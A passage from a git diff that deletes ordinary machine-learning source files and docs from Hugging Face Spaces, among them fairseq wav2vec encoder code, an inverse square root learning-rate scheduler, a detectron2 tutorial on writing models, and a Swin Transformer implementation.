negs = self.project_q(negs) - else: - negs, _ = self.sample_negatives( - y, - y.size(1), - padding_count=padding_count, - ) - - if not is_xla_tensor(x): - # tpu-comment: reducing the size in a dynamic way causes - # too many recompilations on xla. - x = x[mask_indices].view(x.size(0), -1, x.size(-1)) - - if self.target_glu: - y = self.target_glu(y) - negs = self.target_glu(negs) - - x = self.final_proj(x) - x = self.compute_preds(x, y, negs) - - result = { - "x": x, - "padding_mask": padding_mask, - "features_pen": features_pen, - } - - if prob_ppl is not None: - result["prob_perplexity"] = prob_ppl - result["code_perplexity"] = code_ppl - result["num_vars"] = num_vars - result["temp"] = curr_temp - - return result - - def quantize(self, x): - assert self.quantizer is not None - x = self.feature_extractor(x) - x = x.transpose(1, 2) - x = self.layer_norm(x) - return self.quantizer.forward_idx(x) - - def extract_features(self, source, padding_mask, mask=False, layer=None): - res = self.forward( - source, padding_mask, mask=mask, features_only=True, layer=layer - ) - return res - - def get_logits(self, net_output): - logits = net_output["x"] - logits = logits.transpose(0, 2) - logits = logits.reshape(-1, logits.size(-1)) - return logits - - def get_targets(self, sample, net_output, expand_steps=True): - x = net_output["x"] - return x.new_zeros(x.size(1) * x.size(2), dtype=torch.long) - - def get_extra_losses(self, net_output): - pen = [] - - if "prob_perplexity" in net_output: - pen.append( - (net_output["num_vars"] - net_output["prob_perplexity"]) - / net_output["num_vars"] - ) - - if "features_pen" in net_output: - pen.append(net_output["features_pen"]) - - return pen - - def remove_pretraining_modules(self): - self.quantizer = None - self.project_q = None - self.target_glu = None - self.final_proj = None - - -class ConvFeatureExtractionModel(nn.Module): - def __init__( - self, - conv_layers: List[Tuple[int, int, int]], - dropout: float = 0.0, - mode: str = "default", - conv_bias: bool = False, - ): - super().__init__() - - assert mode in {"default", "layer_norm"} - - def block( - n_in, - n_out, - k, - stride, - is_layer_norm=False, - is_group_norm=False, - conv_bias=False, - ): - def make_conv(): - conv = nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias) - nn.init.kaiming_normal_(conv.weight) - return conv - - assert ( - is_layer_norm and is_group_norm - ) == False, "layer norm and group norm are exclusive" - - if is_layer_norm: - return nn.Sequential( - make_conv(), - nn.Dropout(p=dropout), - nn.Sequential( - TransposeLast(), - Fp32LayerNorm(dim, elementwise_affine=True), - TransposeLast(), - ), - nn.GELU(), - ) - elif is_group_norm: - return nn.Sequential( - make_conv(), - nn.Dropout(p=dropout), - Fp32GroupNorm(dim, dim, affine=True), - nn.GELU(), - ) - else: - return nn.Sequential(make_conv(), nn.Dropout(p=dropout), nn.GELU()) - - in_d = 1 - self.conv_layers = nn.ModuleList() - for i, cl in enumerate(conv_layers): - assert len(cl) == 3, "invalid conv definition: " + str(cl) - (dim, k, stride) = cl - - self.conv_layers.append( - block( - in_d, - dim, - k, - stride, - is_layer_norm=mode == "layer_norm", - is_group_norm=mode == "default" and i == 0, - conv_bias=conv_bias, - ) - ) - in_d = dim - - def forward(self, x): - - # BxT -> BxCxT - x = x.unsqueeze(1) - - for conv in self.conv_layers: - x = conv(x) - - return x - - -class TransformerEncoder(nn.Module): - def __init__(self, args): - super().__init__() - - self.dropout = args.dropout - self.embedding_dim = args.encoder_embed_dim - - self.pos_conv = nn.Conv1d( - self.embedding_dim, - self.embedding_dim, - kernel_size=args.conv_pos, - padding=args.conv_pos // 2, - groups=args.conv_pos_groups, - ) - dropout = 0 - std = math.sqrt((4 * (1.0 - dropout)) / (args.conv_pos * self.embedding_dim)) - nn.init.normal_(self.pos_conv.weight, mean=0, std=std) - nn.init.constant_(self.pos_conv.bias, 0) - - self.pos_conv = nn.utils.weight_norm(self.pos_conv, name="weight", dim=2) - self.pos_conv = nn.Sequential(self.pos_conv, SamePad(args.conv_pos), nn.GELU()) - - self.layers = nn.ModuleList( - [ - TransformerSentenceEncoderLayer( - embedding_dim=self.embedding_dim, - ffn_embedding_dim=args.encoder_ffn_embed_dim, - num_attention_heads=args.encoder_attention_heads, - dropout=self.dropout, - attention_dropout=args.attention_dropout, - activation_dropout=args.activation_dropout, - activation_fn=args.activation_fn, - layer_norm_first=args.layer_norm_first, - ) - for _ in range(args.encoder_layers) - ] - ) - - self.layer_norm_first = args.layer_norm_first - self.layer_norm = LayerNorm(self.embedding_dim) - self.layerdrop = args.encoder_layerdrop - - self.apply(init_bert_params) - - def forward(self, x, padding_mask=None, layer=None): - x, layer_results = self.extract_features(x, padding_mask, layer) - - if self.layer_norm_first and layer is None: - x = self.layer_norm(x) - - return x, layer_results - - def extract_features(self, x, padding_mask=None, tgt_layer=None): - - if padding_mask is not None: - x = index_put(x, padding_mask, 0) - - x_conv = self.pos_conv(x.transpose(1, 2)) - x_conv = x_conv.transpose(1, 2) - x = x + x_conv - - if not self.layer_norm_first: - x = self.layer_norm(x) - - x = F.dropout(x, p=self.dropout, training=self.training) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - layer_results = [] - r = None - for i, layer in enumerate(self.layers): - dropout_probability = np.random.random() - if not self.training or (dropout_probability > self.layerdrop): - x, z = layer(x, self_attn_padding_mask=padding_mask, need_weights=False) - if tgt_layer is not None: - layer_results.append((x, z)) - if i == tgt_layer: - r = x - break - - if r is not None: - x = r - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - - return x, layer_results - - def max_positions(self): - """Maximum output length supported by the encoder.""" - return self.args.max_positions - - def upgrade_state_dict_named(self, state_dict, name): - """Upgrade a (possibly old) state dict for new versions of fairseq.""" - return state_dict - - -class TransformerSentenceEncoderLayer(nn.Module): - """ - Implements a Transformer Encoder Layer used in BERT/XLM style pre-trained - models. - """ - - def __init__( - self, - embedding_dim: float = 768, - ffn_embedding_dim: float = 3072, - num_attention_heads: float = 8, - dropout: float = 0.1, - attention_dropout: float = 0.1, - activation_dropout: float = 0.1, - activation_fn: str = "relu", - layer_norm_first: bool = False, - ) -> None: - - super().__init__() - # Initialize parameters - self.embedding_dim = embedding_dim - self.dropout = dropout - self.activation_dropout = activation_dropout - - # Initialize blocks - self.activation_fn = utils.get_activation_fn(activation_fn) - self.self_attn = MultiheadAttention( - self.embedding_dim, - num_attention_heads, - dropout=attention_dropout, - self_attention=True, - ) - - self.dropout1 = nn.Dropout(dropout) - self.dropout2 = nn.Dropout(self.activation_dropout) - self.dropout3 = nn.Dropout(dropout) - - self.layer_norm_first = layer_norm_first - - # layer norm associated with the self attention layer - self.self_attn_layer_norm = LayerNorm(self.embedding_dim) - self.fc1 = nn.Linear(self.embedding_dim, ffn_embedding_dim) - self.fc2 = nn.Linear(ffn_embedding_dim, self.embedding_dim) - - # layer norm associated with the position wise feed-forward NN - self.final_layer_norm = LayerNorm(self.embedding_dim) - - def forward( - self, - x: torch.Tensor, - self_attn_mask: torch.Tensor = None, - self_attn_padding_mask: torch.Tensor = None, - need_weights: bool = False, - att_args=None, - ): - """ - LayerNorm is applied either before or after the self-attention/ffn - modules similar to the original Transformer imlementation. - """ - residual = x - - if self.layer_norm_first: - x = self.self_attn_layer_norm(x) - x, attn = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=self_attn_padding_mask, - attn_mask=self_attn_mask, - ) - x = self.dropout1(x) - x = residual + x - - residual = x - x = self.final_layer_norm(x) - x = self.activation_fn(self.fc1(x)) - x = self.dropout2(x) - x = self.fc2(x) - x = self.dropout3(x) - x = residual + x - else: - x, attn = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=self_attn_padding_mask, - ) - - x = self.dropout1(x) - x = residual + x - - x = self.self_attn_layer_norm(x) - - residual = x - x = self.activation_fn(self.fc1(x)) - x = self.dropout2(x) - x = self.fc2(x) - x = self.dropout3(x) - x = residual + x - x = self.final_layer_norm(x) - - return x, attn diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/optim/lr_scheduler/inverse_square_root_schedule.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/optim/lr_scheduler/inverse_square_root_schedule.py deleted file mode 100644 index 0f87bb5d7ed5c7eb8011d4c651f2ecbf0ae700ac..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/optim/lr_scheduler/inverse_square_root_schedule.py +++ /dev/null @@ -1,85 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from collections.abc import Collection -from dataclasses import dataclass, field -from typing import List - -from omegaconf import II - -from fairseq.dataclass import FairseqDataclass -from fairseq.optim.lr_scheduler import FairseqLRScheduler, register_lr_scheduler - - -@dataclass -class InverseSquareRootLRScheduleConfig(FairseqDataclass): - warmup_updates: int = field( - default=4000, - metadata={"help": "warmup the learning rate linearly for the first N updates"}, - ) - warmup_init_lr: float = field( - default=-1, - metadata={ - "help": "initial learning rate during warmup phase; default is cfg.lr" - }, - ) - lr: List[float] = II("optimization.lr") - - -@register_lr_scheduler("inverse_sqrt", dataclass=InverseSquareRootLRScheduleConfig) -class InverseSquareRootSchedule(FairseqLRScheduler): - """Decay the LR based on the inverse square root of the update number. - - We also support a warmup phase where we linearly increase the learning rate - from some initial learning rate (``--warmup-init-lr``) until the configured - learning rate (``--lr``). Thereafter we decay proportional to the number of - updates, with a decay factor set to align with the configured learning rate. - - During warmup:: - - lrs = torch.linspace(cfg.warmup_init_lr, cfg.lr, cfg.warmup_updates) - lr = lrs[update_num] - - After warmup:: - - decay_factor = cfg.lr * sqrt(cfg.warmup_updates) - lr = decay_factor / sqrt(update_num) - """ - - def __init__(self, cfg: InverseSquareRootLRScheduleConfig, optimizer): - super().__init__(cfg, optimizer) - if isinstance(cfg.lr, Collection) and len(cfg.lr) > 1: - raise ValueError( - "Cannot use a fixed learning rate schedule with inverse_sqrt." - " Consider --lr-scheduler=fixed instead." - ) - warmup_end_lr = cfg.lr[0] if isinstance(cfg.lr, Collection) else cfg.lr - if cfg.warmup_init_lr < 0: - cfg.warmup_init_lr = 0 if cfg.warmup_updates > 0 else warmup_end_lr - - # linearly warmup for the first cfg.warmup_updates - self.lr_step = (warmup_end_lr - cfg.warmup_init_lr) / cfg.warmup_updates - - # then, decay prop. to the inverse square root of the update number - self.decay_factor = warmup_end_lr * cfg.warmup_updates ** 0.5 - - # initial learning rate - self.lr = cfg.warmup_init_lr - self.optimizer.set_lr(self.lr) - - def step(self, epoch, val_loss=None): - """Update the learning rate at the end of the given epoch.""" - super().step(epoch, val_loss) - # we don't change the learning rate at epoch boundaries - return self.optimizer.get_lr() - - def step_update(self, num_updates): - """Update the learning rate after each update.""" - if num_updates < self.cfg.warmup_updates: - self.lr = self.cfg.warmup_init_lr + num_updates * self.lr_step - else: - self.lr = self.decay_factor * num_updates ** -0.5 - self.optimizer.set_lr(self.lr) - return self.lr diff --git a/spaces/Omnibus/Bark-simple/README.md b/spaces/Omnibus/Bark-simple/README.md deleted file mode 100644 index b996ffc73cd0c56741751057fc337ec40dcce73b..0000000000000000000000000000000000000000 --- a/spaces/Omnibus/Bark-simple/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Bark Simple -emoji: 🐕 -colorFrom: red -colorTo: gray -sdk: gradio -sdk_version: 3.41.2 -app_file: app.py -pinned: true ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/OpenDILabCommunity/DI-sheep/DI-sheep/ui/src/main.tsx b/spaces/OpenDILabCommunity/DI-sheep/DI-sheep/ui/src/main.tsx deleted file mode 100644 index a3f01d61399336356c7ad367b3115dbc282bd0f7..0000000000000000000000000000000000000000 --- a/spaces/OpenDILabCommunity/DI-sheep/DI-sheep/ui/src/main.tsx +++ /dev/null @@ -1,10 +0,0 @@ -import React from 'react'; -import ReactDOM from 'react-dom/client'; -import App from './App'; -import './index.css'; - -ReactDOM.createRoot(document.getElementById('root') as HTMLElement).render( - - - -); diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/docs/tutorials/write-models.md b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/docs/tutorials/write-models.md deleted file mode 100644 index 967d126503c71b419bca94615cb1090e1a79cb49..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/docs/tutorials/write-models.md +++ /dev/null @@ -1,90 +0,0 @@ -# Write Models - -If you are trying to do something completely new, you may wish to implement -a model entirely from scratch. However, in many situations you may -be interested in modifying or extending some components of an existing model. -Therefore, we also provide mechanisms that let users override the -behavior of certain internal components of standard models. - - -## Register New Components - -For common concepts that users often want to customize, such as "backbone feature extractor", "box head", -we provide a registration mechanism for users to inject custom implementation that -will be immediately available to use in config files. - -For example, to add a new backbone, import this code in your code: -```python -from detectron2.modeling import BACKBONE_REGISTRY, Backbone, ShapeSpec - -@BACKBONE_REGISTRY.register() -class ToyBackbone(Backbone): - def __init__(self, cfg, input_shape): - super().__init__() - # create your own backbone - self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=16, padding=3) - - def forward(self, image): - return {"conv1": self.conv1(image)} - - def output_shape(self): - return {"conv1": ShapeSpec(channels=64, stride=16)} -``` - -In this code, we implement a new backbone following the interface of the -[Backbone](../modules/modeling.html#detectron2.modeling.Backbone) class, -and register it into the [BACKBONE_REGISTRY](../modules/modeling.html#detectron2.modeling.BACKBONE_REGISTRY) -which requires subclasses of `Backbone`. -After importing this code, detectron2 can link the name of the class to its implementation. Therefore you can write the following code: - -```python -cfg = ... # read a config -cfg.MODEL.BACKBONE.NAME = 'ToyBackbone' # or set it in the config file -model = build_model(cfg) # it will find `ToyBackbone` defined above -``` - -As another example, to add new abilities to the ROI heads in the Generalized R-CNN meta-architecture, -you can implement a new -[ROIHeads](../modules/modeling.html#detectron2.modeling.ROIHeads) subclass and put it in the `ROI_HEADS_REGISTRY`. -[DensePose](../../projects/DensePose) -and [MeshRCNN](https://github.com/facebookresearch/meshrcnn) -are two examples that implement new ROIHeads to perform new tasks. -And [projects/](../../projects/) -contains more examples that implement different architectures. - -A complete list of registries can be found in [API documentation](../modules/modeling.html#model-registries). -You can register components in these registries to customize different parts of a model, or the -entire model. - -## Construct Models with Explicit Arguments - -Registry is a bridge to connect names in config files to the actual code. -They are meant to cover a few main components that users frequently need to replace. -However, the capability of a text-based config file is sometimes limited and -some deeper customization may be available only through writing code. - -Most model components in detectron2 have a clear `__init__` interface that documents -what input arguments it needs. Calling them with custom arguments will give you a custom variant -of the model. - -As an example, to use __custom loss function__ in the box head of a Faster R-CNN, we can do the following: - -1. Losses are currently computed in [FastRCNNOutputLayers](../modules/modeling.html#detectron2.modeling.FastRCNNOutputLayers). - We need to implement a variant or a subclass of it, with custom loss functions, named `MyRCNNOutput`. -2. Call `StandardROIHeads` with `box_predictor=MyRCNNOutput()` argument instead of the builtin `FastRCNNOutputLayers`. - If all other arguments should stay unchanged, this can be easily achieved by using the [configurable `__init__`](../modules/config.html#detectron2.config.configurable) mechanism: - - ```python - roi_heads = StandardROIHeads( - cfg, backbone.output_shape(), - box_predictor=MyRCNNOutput(...) - ) - ``` -3. (optional) If we want to enable this new model from a config file, registration is needed: - ```python - @ROI_HEADS_REGISTRY.register() - class MyStandardROIHeads(StandardROIHeads): - def __init__(self, cfg, input_shape): - super().__init__(cfg, input_shape, - box_predictor=MyRCNNOutput(...)) - ``` diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/swin_transformer.py b/spaces/OpenGVLab/InternGPT/iGPT/models/swin_transformer.py deleted file mode 100644 index c1affc9a8695474e831ad060343c1988d750dc5f..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/swin_transformer.py +++ /dev/null @@ -1,654 +0,0 @@ -# -------------------------------------------------------- -# Swin Transformer -# Copyright (c) 2021 Microsoft -# Licensed under The MIT License [see LICENSE for details] -# Written by Ze Liu -# -------------------------------------------------------- - -import numpy as np -from scipy import interpolate - -import torch -import torch.nn as nn -import torch.utils.checkpoint as checkpoint -from timm.models.layers import DropPath, to_2tuple, trunc_normal_ - - -class Mlp(nn.Module): - def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.): - super().__init__() - out_features = out_features or in_features - hidden_features = hidden_features or in_features - self.fc1 = nn.Linear(in_features, hidden_features) - self.act = act_layer() - self.fc2 = nn.Linear(hidden_features, out_features) - self.drop = nn.Dropout(drop) - - def forward(self, x): - x = self.fc1(x) - x = self.act(x) - x = self.drop(x) - x = self.fc2(x) - x = self.drop(x) - return x - - -def window_partition(x, window_size): - """ - Args: - x: (B, H, W, C) - window_size (int): window size - - Returns: - windows: (num_windows*B, window_size, window_size, C) - """ - B, H, W, C = x.shape - x = x.view(B, H // window_size, window_size, W // window_size, window_size, C) - windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C) - return windows - - -def window_reverse(windows, window_size, H, W): - """ - Args: - windows: (num_windows*B, window_size, window_size, C) - window_size (int): Window size - H (int): Height of image - W (int): Width of image - - Returns: - x: (B, H, W, C) - """ - B = int(windows.shape[0] / (H * W / window_size / window_size)) - x = windows.view(B, H // window_size, W // window_size, window_size, window_size, -1) - x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1) - return x - - -class WindowAttention(nn.Module): - r""" Window based multi-head self attention (W-MSA) module with relative position bias. - It supports both of shifted and non-shifted window. - - Args: - dim (int): Number of input channels. - window_size (tuple[int]): The height and width of the window. - num_heads (int): Number of attention heads. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set - attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0 - proj_drop (float, optional): Dropout ratio of output. Default: 0.0 - """ - - def __init__(self, dim, window_size, num_heads, qkv_bias=True, qk_scale=None, attn_drop=0., proj_drop=0.): - - super().__init__() - self.dim = dim - self.window_size = window_size # Wh, Ww - self.num_heads = num_heads - head_dim = dim // num_heads - self.scale = qk_scale or head_dim ** -0.5 - - # define a parameter table of relative position bias - self.relative_position_bias_table = nn.Parameter( - torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), num_heads)) # 2*Wh-1 * 2*Ww-1, nH - - # get pair-wise relative position index for each token inside the window - coords_h = torch.arange(self.window_size[0]) - coords_w = torch.arange(self.window_size[1]) - coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Wh, Ww - coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww - relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww - relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2 - relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0 - relative_coords[:, :, 1] += self.window_size[1] - 1 - relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1 - relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww - self.register_buffer("relative_position_index", relative_position_index) - - self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - trunc_normal_(self.relative_position_bias_table, std=.02) - self.softmax = nn.Softmax(dim=-1) - - def forward(self, x, mask=None): - """ - Args: - x: input features with shape of (num_windows*B, N, C) - mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None - """ - B_, N, C = x.shape - qkv = self.qkv(x).reshape(B_, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4) - q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple) - - q = q * self.scale - attn = (q @ k.transpose(-2, -1)) - - relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)].view( - self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1) # Wh*Ww,Wh*Ww,nH - relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous() # nH, Wh*Ww, Wh*Ww - attn = attn + relative_position_bias.unsqueeze(0) - - if mask is not None: - nW = mask.shape[0] - attn = attn.view(B_ // nW, nW, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0) - attn = attn.view(-1, self.num_heads, N, N) - attn = self.softmax(attn) - else: - attn = self.softmax(attn) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B_, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - - def extra_repr(self) -> str: - return f'dim={self.dim}, window_size={self.window_size}, num_heads={self.num_heads}' - - def flops(self, N): - # calculate flops for 1 window with token length of N - flops = 0 - # qkv = self.qkv(x) - flops += N * self.dim * 3 * self.dim - # attn = (q @ k.transpose(-2, -1)) - flops += self.num_heads * N * (self.dim // self.num_heads) * N - # x = (attn @ v) - flops += self.num_heads * N * N * (self.dim // self.num_heads) - # x = self.proj(x) - flops += N * self.dim * self.dim - return flops - - -class SwinTransformerBlock(nn.Module): - r""" Swin Transformer Block. - - Args: - dim (int): Number of input channels. - input_resolution (tuple[int]): Input resulotion. - num_heads (int): Number of attention heads. - window_size (int): Window size. - shift_size (int): Shift size for SW-MSA. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float, optional): Stochastic depth rate. Default: 0.0 - act_layer (nn.Module, optional): Activation layer. Default: nn.GELU - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__(self, dim, input_resolution, num_heads, window_size=7, shift_size=0, - mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0., drop_path=0., - act_layer=nn.GELU, norm_layer=nn.LayerNorm): - super().__init__() - self.dim = dim - self.input_resolution = input_resolution - self.num_heads = num_heads - self.window_size = window_size - self.shift_size = shift_size - self.mlp_ratio = mlp_ratio - if min(self.input_resolution) <= self.window_size: - # if window size is larger than input resolution, we don't partition windows - self.shift_size = 0 - self.window_size = min(self.input_resolution) - assert 0 <= self.shift_size < self.window_size, "shift_size must in 0-window_size" - - self.norm1 = norm_layer(dim) - self.attn = WindowAttention( - dim, window_size=to_2tuple(self.window_size), num_heads=num_heads, - qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop) - - self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity() - self.norm2 = norm_layer(dim) - mlp_hidden_dim = int(dim * mlp_ratio) - self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop) - - if self.shift_size > 0: - # calculate attention mask for SW-MSA - H, W = self.input_resolution - img_mask = torch.zeros((1, H, W, 1)) # 1 H W 1 - h_slices = (slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None)) - w_slices = (slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None)) - cnt = 0 - for h in h_slices: - for w in w_slices: - img_mask[:, h, w, :] = cnt - cnt += 1 - - mask_windows = window_partition(img_mask, self.window_size) # nW, window_size, window_size, 1 - mask_windows = mask_windows.view(-1, self.window_size * self.window_size) - attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) - attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0)) - else: - attn_mask = None - - self.register_buffer("attn_mask", attn_mask) - - def forward(self, x): - H, W = self.input_resolution - B, L, C = x.shape - assert L == H * W, "input feature has wrong size" - - shortcut = x - x = self.norm1(x) - x = x.view(B, H, W, C) - - # cyclic shift - if self.shift_size > 0: - shifted_x = torch.roll(x, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2)) - else: - shifted_x = x - - # partition windows - x_windows = window_partition(shifted_x, self.window_size) # nW*B, window_size, window_size, C - x_windows = x_windows.view(-1, self.window_size * self.window_size, C) # nW*B, window_size*window_size, C - - # W-MSA/SW-MSA - attn_windows = self.attn(x_windows, mask=self.attn_mask) # nW*B, window_size*window_size, C - - # merge windows - attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C) - shifted_x = window_reverse(attn_windows, self.window_size, H, W) # B H' W' C - - # reverse cyclic shift - if self.shift_size > 0: - x = torch.roll(shifted_x, shifts=(self.shift_size, self.shift_size), dims=(1, 2)) - else: - x = shifted_x - x = x.view(B, H * W, C) - - # FFN - x = shortcut + self.drop_path(x) - x = x + self.drop_path(self.mlp(self.norm2(x))) - - return x - - def extra_repr(self) -> str: - return f"dim={self.dim}, input_resolution={self.input_resolution}, num_heads={self.num_heads}, " \ - f"window_size={self.window_size}, shift_size={self.shift_size}, mlp_ratio={self.mlp_ratio}" - - def flops(self): - flops = 0 - H, W = self.input_resolution - # norm1 - flops += self.dim * H * W - # W-MSA/SW-MSA - nW = H * W / self.window_size / self.window_size - flops += nW * self.attn.flops(self.window_size * self.window_size) - # mlp - flops += 2 * H * W * self.dim * self.dim * self.mlp_ratio - # norm2 - flops += self.dim * H * W - return flops - - -class PatchMerging(nn.Module): - r""" Patch Merging Layer. - - Args: - input_resolution (tuple[int]): Resolution of input feature. - dim (int): Number of input channels. - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__(self, input_resolution, dim, norm_layer=nn.LayerNorm): - super().__init__() - self.input_resolution = input_resolution - self.dim = dim - self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False) - self.norm = norm_layer(4 * dim) - - def forward(self, x): - """ - x: B, H*W, C - """ - H, W = self.input_resolution - B, L, C = x.shape - assert L == H * W, "input feature has wrong size" - assert H % 2 == 0 and W % 2 == 0, f"x size ({H}*{W}) are not even." - - x = x.view(B, H, W, C) - - x0 = x[:, 0::2, 0::2, :] # B H/2 W/2 C - x1 = x[:, 1::2, 0::2, :] # B H/2 W/2 C - x2 = x[:, 0::2, 1::2, :] # B H/2 W/2 C - x3 = x[:, 1::2, 1::2, :] # B H/2 W/2 C - x = torch.cat([x0, x1, x2, x3], -1) # B H/2 W/2 4*C - x = x.view(B, -1, 4 * C) # B H/2*W/2 4*C - - x = self.norm(x) - x = self.reduction(x) - - return x - - def extra_repr(self) -> str: - return f"input_resolution={self.input_resolution}, dim={self.dim}" - - def flops(self): - H, W = self.input_resolution - flops = H * W * self.dim - flops += (H // 2) * (W // 2) * 4 * self.dim * 2 * self.dim - return flops - - -class BasicLayer(nn.Module): - """ A basic Swin Transformer layer for one stage. - - Args: - dim (int): Number of input channels. - input_resolution (tuple[int]): Input resolution. - depth (int): Number of blocks. - num_heads (int): Number of attention heads. - window_size (int): Local window size. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0 - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - downsample (nn.Module | None, optional): Downsample layer at the end of the layer. Default: None - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. - """ - - def __init__(self, dim, input_resolution, depth, num_heads, window_size, - mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0., - drop_path=0., norm_layer=nn.LayerNorm, downsample=None, use_checkpoint=False): - - super().__init__() - self.dim = dim - self.input_resolution = input_resolution - self.depth = depth - self.use_checkpoint = use_checkpoint - - # build blocks - self.blocks = nn.ModuleList([ - SwinTransformerBlock(dim=dim, input_resolution=input_resolution, - num_heads=num_heads, window_size=window_size, - shift_size=0 if (i % 2 == 0) else window_size // 2, - mlp_ratio=mlp_ratio, - qkv_bias=qkv_bias, qk_scale=qk_scale, - drop=drop, attn_drop=attn_drop, - drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path, - norm_layer=norm_layer) - for i in range(depth)]) - - # patch merging layer - if downsample is not None: - self.downsample = downsample(input_resolution, dim=dim, norm_layer=norm_layer) - else: - self.downsample = None - - def forward(self, x): - for blk in self.blocks: - if self.use_checkpoint: - x = checkpoint.checkpoint(blk, x) - else: - x = blk(x) - if self.downsample is not None: - x = self.downsample(x) - return x - - def extra_repr(self) -> str: - return f"dim={self.dim}, input_resolution={self.input_resolution}, depth={self.depth}" - - def flops(self): - flops = 0 - for blk in self.blocks: - flops += blk.flops() - if self.downsample is not None: - flops += self.downsample.flops() - return flops - - -class PatchEmbed(nn.Module): - r""" Image to Patch Embedding - - Args: - img_size (int): Image size. Default: 224. - patch_size (int): Patch token size. Default: 4. - in_chans (int): Number of input image channels. Default: 3. - embed_dim (int): Number of linear projection output channels. Default: 96. - norm_layer (nn.Module, optional): Normalization layer. Default: None - """ - - def __init__(self, img_size=224, patch_size=4, in_chans=3, embed_dim=96, norm_layer=None): - super().__init__() - img_size = to_2tuple(img_size) - patch_size = to_2tuple(patch_size) - patches_resolution = [img_size[0] // patch_size[0], img_size[1] // patch_size[1]] - self.img_size = img_size - self.patch_size = patch_size - self.patches_resolution = patches_resolution - self.num_patches = patches_resolution[0] * patches_resolution[1] - - self.in_chans = in_chans - self.embed_dim = embed_dim - - self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) - if norm_layer is not None: - self.norm = norm_layer(embed_dim) - else: - self.norm = None - - def forward(self, x): - B, C, H, W = x.shape - # FIXME look at relaxing size constraints - assert H == self.img_size[0] and W == self.img_size[1], \ - f"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]})." - x 